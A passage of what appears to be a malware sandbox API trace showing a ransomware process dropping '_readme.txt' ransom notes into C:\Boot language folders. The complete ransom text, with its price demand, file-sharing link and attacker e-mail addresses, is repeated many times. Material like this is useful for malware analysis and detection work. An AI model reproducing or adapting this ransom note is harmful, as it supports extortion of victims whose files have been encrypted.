Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.966] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.967] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0090.967] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.967] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.967] PathFindFileNameW (pszPath="") returned="" [0090.967] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.967] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.967] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.967] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.968] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.968] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0090.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.968] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.968] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0090.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.968] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.968] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.968] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.969] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.969] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.969] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.969] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.970] CloseHandle (hObject=0x5cc) returned 1 [0090.970] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.970] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.970] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.970] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.970] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.970] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.970] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.970] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.970] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.970] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a3340, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.970] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a3340, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.970] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.970] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.970] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.970] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.970] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.970] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.971] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.971] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0090.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.971] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.972] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.972] PathFindFileNameW (pszPath="") returned="" [0090.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.972] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.972] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.972] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.972] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.972] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0090.972] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.972] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.972] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0090.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.973] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.973] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without 